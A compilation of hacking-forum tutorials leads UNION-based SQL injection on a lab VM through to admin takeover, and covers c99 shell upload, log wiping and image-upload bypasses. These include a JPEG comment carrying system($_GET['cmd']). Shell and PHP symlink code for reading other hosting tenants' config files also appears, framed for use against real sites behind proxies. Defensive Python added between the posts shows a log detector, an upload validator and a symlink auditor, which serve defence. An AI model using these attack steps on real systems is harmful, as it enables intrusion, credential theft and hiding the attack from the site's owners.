Advanced SQL Injection Tutorial - Complete website Rooting by h4ck3r $p1d3r

This work has been in proud memorial to my haters, the social fake system and some of my best friends.

Note: Credit goes to the following.


Credits for the Tutorial and the r00t :-

1337
4MY H4CK3R
CR CR4CK3R
MR. D00ZI3.
N30 H4CK3R

Well, before I go through the tutorial, let me introduce myself. I am a complete noob at hacking, but I do hack and have hacked some good sites, and I know the basics; not much, but I can rely on my basics. So before going through this tutorial, what you will need are the following:


1.) A Working Brain to understand the concept.
2.) A Computer that runs Windows [Linux is better]
3.) Patience


So, before introducing my re-edited edition of what my friend and the contributors had already written, I made it more noob friendly for the members here at Hackforums. I am NOT the original writer of this method, and take no responsibility for what you do with this thing, but I should just tell you -> Always prepare yourself behind 3 proxies before getting your hands dirty on a legal server. The precautions that you can take are: be sure to use a proxy with SSH and use PuTTY or Tor, whichever suits you the most. I have also added images to make things clearer for the beginners. Remember, in hacking and exploring, you always have to get your hands dirty and keep exploring, so please be patient till the end of this thread as it will be a long procedure; in any way, if you get distracted by the long method, you fail. So good luck on your fascinating journey on r00ting servers.


- Computer Science.


Note on my THREAD -> It took me a lot of time to design this thread for the convenience of the users here at Hackforums, so please kindly add a reply to the thread to keep it alive as well as make me feel that the work I did was fruitful. I would appreciate that. Thanks.


The ORIGINAL content from Advance SQLi to r00ting starts here :)


What you will need are the following :


1. Mantra Security Toolkit

2. A vulnerable website. I'm using a modified version of LAMPSecurity CTF6

3. Any PHP Shell you are comfortable with
- Google for "c99 shell" I recommend Devil shell from Team Nuts, Indian Hackers.

The Process.


I have a Website for you :)

Code:
http://192.168.132.128/

[Image: mantrahackbar1.jpg]

I went through all the pages of web site and found a page with URL input

Code:
http://192.168.132.128/?id=13

[Image: mantrahackbar2.jpg]

I launched Hackbar by pressing F9

[Image: mantrahackbar3.jpg]

The power of the single quote. I'm checking whether the web site is vulnerable or not by putting a ' at the end of the URL and pressing Execute.

Code:
http://192.168.132.128/?id=13'

[Image: mantrahackbar4.jpg]

Since the page content is different from the previous one, I can be sure that the web page is vulnerable. And you might already know how a vulnerable webpage looks.
Let's find out the number of tables.
So we will be using the ORDER+BY command.

Code:
http://192.168.132.128/?id=13 order by 1

[Image: mantrahackbar6.jpg]

I have to keep on increasing the last number till I see any changes in the page. In usual practice it's gonna be a tedious task since there will be hundreds and thousands of tables if not more. But with this tool I can simply press on the + button till I see any changes on the webpage.

Code:
http://192.168.132.128/?id=13 order by 7

[Image: mantrahackbar7.jpg]

I went up to 7 and no change till now

Code:
http://192.168.132.128/?id=13 order by 7

[Image: mantrahackbar12.jpg]

The ORDER+BY Injection at 8 changes the page, so I find a way to hack this webserver :P

Code:
http://192.168.132.128/?id=13 order by 8

[Image: mantrahackbar13.jpg]

Now let's go ahead and make a UNION statement. I just went to SQL > UNION SELECT STATEMENT.

[Image: mantrahackbar14.jpg]

I provided the number of tables. Since I got a different page on table 8, I can be sure that table 8 does not exist and there are only 7 tables.

[Image: mantrahackbar16.jpg]

Wonderful. I can see some numbers on the page now. Those are the vulnerable columns. Let's take the number 2.






Code:
http://192.168.132.128/?id=13 UNION SELECT 1,2,3,4,5,6,7

[Image: mantrahackbar19.jpg]

I replaced number 2 in URL with another SQL command, it got executed and result is displayed on the page, I don't have to explain these if you already know Basic SQLi tricks.

Code:
http://192.168.132.128/?id=13 UNION SELECT 1,user(),3,4,5,6,7

[Image: mantrahackbar21.jpg]
The current user is cms_user@localhost.
Let's find out the version of the database. I replaced 2 in the URL with the version() command.

Code:
http://192.168.132.128/?id=13 UNION SELECT 1,version(),3,4,5,6,7

[Image: mantrahackbar22.jpg]

5.0.45 is the version, so I think that will be an easy target. Google more and research for versions below this, or for any other versions you get, such as 4.0.x. Let me list all the tables.

Code:
http://192.168.132.128/?id=13 UNION SELECT 1,table_name,3,4,5,6,7 from information_schema.tables

[Image: mantrahackbar23.jpg]

From this list I found "user" is an interesting table. Now I listed all the columns and it's a big list.

Code:
http://192.168.132.128/?id=13 UNION SELECT 1,column_name,3,4,5,6,7 from information_schema.columns

[Image: mantrahackbar24.jpg]

I want columns from the table "user" and nothing else

Code:
http://192.168.132.128/?id=13 UNION SELECT 1,column_name,3,4,5,6,7 from information_schema.columns where table_name='user'


[Image: mantrahackbar25.jpg]

Let's find the user name

Code:
http://192.168.132.128/?id=13 UNION SELECT 1,user_username,3,4,5,6,7 from user
Now, what about the password?

Code:
http://192.168.132.128/?id=13 UNION SELECT 1,user_password,3,4,5,6,7 from user

[Image: mantrahackbar26.jpg]

It is encrypted, ha ha. Decrypting the password: I copied the MD5 hash, pasted it into Hackbar and went to Encryption > MD5 Menu > send to > md5.rednoize.com

[Image: mantrahackbar30.jpg]

Voila.!!! I got the password

[Image: mantrahackbar31.jpg]

Finding the login page. It was right in front of me, but in other cases you need to find it. I ain't going to explain everything; you have to do a lot of research, and that is how hackers do, and explorers and pirates explore.

[Image: mantrahackbar32.jpg]

Logging in with the credentials I have, Greetings.!!! I'm an admin now. Look at my powers. Let me add an event.

[Image: mantrahackbar37.jpg]

and of course I want to upload a picture

[Image: mantrahackbar38.jpg]

Let's see whether it allows me to upload the shell or not

[Image: mantrahackbar39.jpg]

Now I'm pressing on "Add Event" button

[Image: mantrahackbar40.jpg]

Nice. Looks like it got uploaded

[Image: mantrahackbar41.jpg]

Let's see where the shell got uploaded to

[Image: mantrahackbar42.jpg]


I'm trying to get the default upload location

[Image: mantrahackbar43.jpg]
[Image: mantrahackbar44.jpg]
Looks like I got it. Let me click on the c9shell.php file I just uploaded. Voila. I have shell access

[Image: mantrahackbar46.jpg]
I simply clicked on the up button to get the root folder

[Image: mantrahackbar48.jpg]
Now I can do whatever I wish: deface the website, maintain access or whatever. But it's out of the scope of the current tutorial.

What I'm interested in is the log folder.
I clicked on the log.log file and it has the logs of my noisy SQL injection attacks.
Let me go back and edit the log file.

[Image: mantrahackbar52.jpg]
[Image: mantrahackbar53.jpg]
I deleted complete log entries. Now saving it. Nice. Log file is empty now

[Image: mantrahackbar56.jpg]
Now, let's remove the c99 shell by pressing on Self Remove. Confirmed.!!! OK. Good Bye C99

[Image: mantrahackbar60.jpg]

Thanks for your patience. Keep the THREAD alive by simply giving out a reply; a reply would justify my hard work on this THREAD :)

SQLi + R00ting, STEP by STEP each with Pictures, best in whole HF.

Advanced SQLi Tutorial - Complete website r00ting

By admin → Wednesday, January 22, 2014
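
Added example, not part of the original post: the walkthrough calls its own requests "noisy", and this sketch shows what that noise looks like to a defender by classifying the request patterns it uses (quote probe, incrementing ORDER BY, UNION SELECT, `version()`/`user()`, `information_schema`) per client. The log lines are constructed, and the rule names and the three stage labels are assumptions of this example.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus, urlsplit

# Constructed access-log lines replaying requests shown in the walkthrough above.
SAMPLE_LOG = """\
192.168.132.1 - - [22/Jan/2014:10:00:01 +0000] "GET /?id=13 HTTP/1.1" 200 5120
192.168.132.1 - - [22/Jan/2014:10:00:05 +0000] "GET /?id=13%27 HTTP/1.1" 200 812
192.168.132.1 - - [22/Jan/2014:10:00:09 +0000] "GET /?id=13%20order%20by%201 HTTP/1.1" 200 5120
192.168.132.1 - - [22/Jan/2014:10:00:12 +0000] "GET /?id=13+order+by+7 HTTP/1.1" 200 5120
192.168.132.1 - - [22/Jan/2014:10:00:14 +0000] "GET /?id=13%20order%20by%208 HTTP/1.1" 200 812
192.168.132.1 - - [22/Jan/2014:10:00:20 +0000] "GET /?id=13%20UNION%20SELECT%201,version(),3,4,5,6,7 HTTP/1.1" 200 5300
192.168.132.1 - - [22/Jan/2014:10:00:31 +0000] "GET /?id=13%20UNION%20SELECT%201,table_name,3,4,5,6,7%20from%20information_schema.tables HTTP/1.1" 200 9100
192.168.132.7 - - [22/Jan/2014:10:01:00 +0000] "GET /?id=14 HTTP/1.1" 200 4980
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Hypothetical rule names; each regex runs on the URL-decoded, lower-cased query.
RULES = {
    "quote_probe": re.compile(r"['\"]"),  # low confidence on its own
    "order_by_probe": re.compile(r"\border\s+by\s+(\d+)\b"),
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b"),
    "db_fingerprint": re.compile(r"\b(?:user|version|database)\s*\(\s*\)"),
    "schema_enum": re.compile(r"\binformation_schema\s*\.\s*(?:tables|columns)\b"),
}


def normalise(query: str) -> str:
    """Decode %XX and '+' so 'order+by' and 'order%20by' look the same."""
    return re.sub(r"\s+", " ", unquote_plus(query).lower())


def analyze(log_text: str) -> dict:
    """Return {client_ip: {"rules": set, "order_by": [n, ...], "requests": int}}."""
    clients = defaultdict(lambda: {"rules": set(), "order_by": [], "requests": 0})
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        query = normalise(urlsplit(m["target"]).query)
        hits = {name for name, rx in RULES.items() if rx.search(query)}
        if not hits:
            continue
        client = clients[m["ip"]]
        client["requests"] += 1
        client["rules"] |= hits
        order_by = RULES["order_by_probe"].search(query)
        if order_by:
            client["order_by"].append(int(order_by.group(1)))
    return dict(clients)


def stage(client: dict) -> str:
    """Map the rules a client triggered to the furthest stage it reached."""
    rules = client["rules"]
    if "schema_enum" in rules or {"union_select", "db_fingerprint"} <= rules:
        return "extraction"
    if "union_select" in rules or len(set(client["order_by"])) >= 2:
        return "enumeration"
    return "probe"


if __name__ == "__main__":
    for ip, client in analyze(SAMPLE_LOG).items():
        print(ip, stage(client), sorted(client["rules"]), client["order_by"])
```

The walkthrough ends with the web user emptying `log.log`, so run a check like this on a copy of the log that has been forwarded off the host, not on a file the web server account can write.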



    Some SQL Vulnerable Website

    By admin →

    This is the tutorial on uploading shell by bypassing the upload image script!!

    So someone you want to pwn has got a nice little option on their website to upload an image. Instead we're going to try to upload some PHP code so we can eventually own the box.

    The following are ways to do this

    Firstly, just try to upload the shell. If this doesn't work, add GIF89a; to the top of your shell.php. Example:
    GIF89a;

    Depending on what kind of file validation they are using, this may fool the server into thinking it's an image, since when it reads the file it finds the GIF header and assumes it's safe since it's an image.


    The next way is to rename your shell to shell.php.jpg and trying to upload. This works because the is a null byte and the server should drop it and anything after it but when you upload, it reads it as a .jpg and not a .php.

    Another way you can fool the web server into thinking you're uploading an image instead of a PHP shell is to get Firefox and install the Tamper Data add-on, then click Start Tamper and upload your PHP shell, then tamper the data and change the Content-Type from 'application/octet-stream' to 'image/jpeg'.
    ^ self explanatory.


    The final way I'm going to discuss is somewhat good.

    Find yourself a copy of edjpgcom.exe
    "edjpgcom is a free Windows application that allows you to change (or
    add) a JPEG comment in a JPEG file."
    Usage:
    --
    edjpgcom "filename.jpg"
    Now add this to the jpg comment, since you won't be able to drop a whole shell in there due to limits etc.
    ";
    system($_GET['cmd']);
    echo "
    ";
    ?>
    Now rename your jpg to .php and upload.
    This works since the JPEG and all its attributes are still intact and it seems like a normal jpg to the server.

    You can try and combine these techniques

    how to upload shell

    By admin →
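
Added example, not part of the original post: a server-side upload check showing why each trick listed above (GIF89a prefix, double extension, edited Content-Type, JPEG comment renamed to .php) fails when the server allowlists a single extension, matches it against the file's own leading bytes, ignores the client's Content-Type and picks the stored name itself. The function names, the sample bytes and the `<?php` scan are assumptions of this example; all inputs are constructed placeholders.

```python
import secrets
from pathlib import PurePosixPath

# Leading magic bytes for the only types this (hypothetical) endpoint accepts.
MAGIC = {
    "jpg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}
ALLOWED_EXT = {".jpg": "jpg", ".jpeg": "jpg", ".png": "png", ".gif": "gif"}


def sniff(data: bytes):
    """Return the image kind indicated by the file's leading bytes, or None."""
    for kind, signatures in MAGIC.items():
        if data.startswith(signatures):
            return kind
    return None


def validate_upload(filename: str, client_content_type: str, data: bytes):
    """Return (stored_name, None) if accepted, else (None, reason)."""
    # client_content_type is set by the client (the Tamper Data step), so it is ignored.
    if "\x00" in filename:
        return None, "NUL byte in filename"
    name = PurePosixPath(filename.replace("\\", "/")).name
    suffixes = [s.lower() for s in PurePosixPath(name).suffixes]
    # Exactly one extension, and it must be allowlisted. Strict by design:
    # this rejects shell.php and shell.php.jpg, and the client name is discarded anyway.
    if len(suffixes) != 1 or suffixes[0] not in ALLOWED_EXT:
        return None, "extension not allowed"
    if sniff(data) != ALLOWED_EXT[suffixes[0]]:
        return None, "content does not match extension"
    # Heuristic defence in depth: a valid header or JPEG comment can carry script text.
    if b"<?php" in data.lower():
        return None, "embedded PHP open tag"
    # Server-chosen name; the extension comes from the sniffed type, never the client.
    return f"{secrets.token_hex(16)}.{ALLOWED_EXT[suffixes[0]]}", None


# Constructed sample inputs (placeholders, not working payloads or real images).
PHP_STUB = b"<?php /* placeholder, not a shell */ ?>"
CLEAN_JPEG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 32 + b"\xff\xd9"
COMMENT_JPEG = (b"\xff\xd8\xff\xfe" + (len(PHP_STUB) + 2).to_bytes(2, "big")
                + PHP_STUB + b"\xff\xd9")

CASES = [
    ("shell.php", "image/gif", b"GIF89a;" + PHP_STUB),       # GIF header on a .php file
    ("shell.php.jpg", "image/jpeg", CLEAN_JPEG),              # double extension
    ("shell.php", "image/jpeg", PHP_STUB),                    # Content-Type edited in transit
    ("photo.php", "image/jpeg", COMMENT_JPEG),                # JPEG comment, renamed to .php
    ("avatar.gif", "image/gif", b"GIF89a;" + PHP_STUB),       # GIF header, image extension
    ("photo.jpg", "image/jpeg", COMMENT_JPEG),                # JPEG comment, image extension
    ("photo.png", "image/png", CLEAN_JPEG),                   # extension and bytes disagree
    ("photo.jpg", "application/octet-stream", CLEAN_JPEG),    # ordinary upload
]


def run_cases():
    """Return the rejection reason (or None if accepted) for every case above."""
    return [validate_upload(*case)[1] for case in CASES]


if __name__ == "__main__":
    for (name, ctype, _), reason in zip(CASES, run_cases()):
        print(f"{name:15} {ctype:26} -> {reason or 'accepted'}")
```

Store accepted files outside the document root, or in a directory where the web server will not execute scripts; validation alone does not make an uploaded file safe to serve.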
    How to symlink ? (TUTORIAL)

    Written by -h4ck3r $p1d3r- for beginner webhackers.

    NOTE : I do not take any responsibility for your actions. This was written for educational purposes only! Also sorry for my bad English!


    Hello Hackers.
    Today I'll try to help beginner webhackers by teaching them a method called symlink.

    What is symlink ?
    Symlink is a method used by hackers to read files from other users on a linux server, only by using a php-shell.

    So what do we require to start the tutorial :

    Requirements :

    - a phpshell uploaded in a linux server (Safe MODE = OFF )
    - a target site
    - basic phpshell & linux knowledge
    - a brain !

    Let's start by the tutorial.

    Where to get a target, if you only have a phpshell uploaded in a linux server that has some sites ?
    It's easy , first get the IP of the server.
    Then go to bing.com and search like that :
    Code:

    ip:xx.xxx.xxx.xxx vbulletin

    Replace xxx with the IP address of the server; 'vbulletin' you can change to the name of a forum software or a CMS you wish as a target. But for this example I'll take vBulletin.

    OK , now we got the target site , let's suppose that its domain name is mytarget.com and it uses vBulletin forum software.

    Now starts the real hacking !

    Go to your phpshell, and in the 'Execute command' field, execute this command:
    Code:

    ls -la /etc/valiases/mytarget.com
    By executing this command, I'll get the name of the user (on the linux server) that keeps the website mytarget.com.
    It should return a result similar to this:

    >>>>>>>-rw-r--r-- 1 target mail 28 May 28 2011 /etc/valiases/mytarget.com

    The red colored piece is the user of mytarget.com on the server.
    So in our case the username is 'target'

    Many of us know that the configuration file of the vBulletin script can be found in /includes/config.php.
    This is the file we need to read in our case, in order to get access to our target site.
    How can we read that file?
    Simple, execute this command on the shell:
    Code:

    ln -s /home/target/public_html/includes/config.php symlink.txt
    As you can see, we're writing the content of config.php into the symlink.txt file.
    After you execute the command, you will see a new file called symlink.txt.
    Open it and w00t !! You successfully read the configuration file (symlinked).
    Now, just get a MySQL connector script coded in PHP, and log in with the details you get from the configuration file of your target. Then at the admin table, get the admin's hash and crack it, or better, change the admin's email to yours, and then do a forgot password at mytarget.com
    And then you will successfully get full access to your target site!

    That was all ,very easy if you practice many times. Maybe soon i will make a video tutorial if you still didn't understand , just request the video tut in the comments , and i will try ASAP to make it for you !

    Thanks for reading , -ThatGuy- !

    How to symlink on a linux server

    By admin →


    First of all we use the Symlink function to make a shortcut for any file or folder we want; that's why this function will be very useful for us to read any folder or file we want (For More Info Use Google).

    Here We are using the Shell Named "c99" to execute the small code of php(Eval Code) on the shared hosting server.

    The Exploit is used to download the slave's database If and only if the slave is in a shared host


    Download the below Shell & Follow the steps.

    ================================================================
    Get Any C99 Shell
    ================================================================

    /Step 1 $ Upload the php i.e Shell_Silic0n.php

    Shell on your root path. That is /home/hackerz/public_html .

    /Step 2 $ Open the uploaded file . The path will look like

    ================================================================
    http://www.yoursitename.com/shell_Silic0n.php
    ================================================================


    /Step 3 $ Next Step is read carefully the below php Eval Code . it's about 10 lines of php code.


    !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!​!!!

    $filepath='/home/xx/public_html/xx.xx';
    $sitepath='/home/xx/public_html/';
    $writeblefilepath='myfile.txt';$flib=$sitepath.$writeblefilepath;
    @unlink($flib);
    symlink($filepath, $flib);
    echo readlink($flib) . "\n";
    ".file_get_contents("http://" .  $_SERVER['HTTP_HOST'] . "/" . $writeblefilepath)."</tex" .  "tarea>";
    @unlink($flib);

    !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

    /Step 4 $ You should replace (xx) in the code in the upper two lines.

    In the 1st xx in the line one, means the target username.

    In the 2nd xx.xx in the line one, means the target file full path; in other words, it's usually used to read database configuration files to steal their connection information.

    xx in the line two, means your username. "For Eg :- /home/Your_Ass/public_html/configuration.php"

    $writeblefilepath, to enter any writable path on your site; it is also used to do the link process and write the output. For @unlink you can search for them on php.net
    echo "

    Private Symlink(PHP)

    By admin →
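
Added example, not part of the original posts: both symlink write-ups above depend on a link inside one account's web root that resolves into another account's files, so a shared-hosting admin can audit for exactly that. This sketch walks a web root without following links and reports every symlink whose target lies outside the owning account's home or belongs to a different uid; the directory layout, the account name `tenant_a` and the function names are constructed for the example.

```python
import os
import tempfile


def find_foreign_symlinks(webroot: str, home: str):
    """List symlinks under webroot that resolve outside `home` or to another owner's file."""
    home_real = os.path.realpath(home)
    findings = []
    # followlinks=False: report links, never traverse through them.
    for dirpath, dirnames, filenames in os.walk(webroot, followlinks=False):
        for name in dirnames + filenames:
            link = os.path.join(dirpath, name)
            if not os.path.islink(link):
                continue
            target = os.path.realpath(link)
            outside = os.path.commonpath([home_real, target]) != home_real
            try:
                # Link owner vs. target owner: the comparison Apache's
                # SymLinksIfOwnerMatch option makes when a file is requested.
                owner_mismatch = os.stat(target).st_uid != os.lstat(link).st_uid
            except OSError:
                owner_mismatch = None  # dangling link or target not readable by the auditor
            if outside or owner_mismatch:
                findings.append({
                    "link": link,
                    "target": target,
                    "outside_home": outside,
                    "owner_mismatch": owner_mismatch,
                })
    return findings


def build_demo_tree(base: str):
    """Create a constructed two-account layout under base.

    Returns (webroot, home, other_account_file).
    """
    home = os.path.join(base, "home", "tenant_a")  # hypothetical account being audited
    webroot = os.path.join(home, "public_html")
    other = os.path.join(base, "home", "target", "public_html", "includes", "config.php")
    os.makedirs(os.path.join(webroot, "releases", "v1"))
    os.makedirs(os.path.dirname(other))
    with open(other, "w") as fh:
        fh.write("placeholder\n")
    # Link of the kind the posts create: it points into another account's tree.
    os.symlink(other, os.path.join(webroot, "symlink.txt"))
    # Ordinary deployment link that stays inside the account's own home.
    os.symlink(os.path.join(webroot, "releases", "v1"), os.path.join(webroot, "current"))
    return webroot, home, other


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as base:
        webroot, home, _ = build_demo_tree(base)
        for finding in find_foreign_symlinks(webroot, home):
            print(finding)
```

On Apache, `Options -FollowSymLinks +SymLinksIfOwnerMatch` applies the same owner comparison when a file is served, and keeping files such as `config.php` unreadable to other accounts removes what such a link would expose.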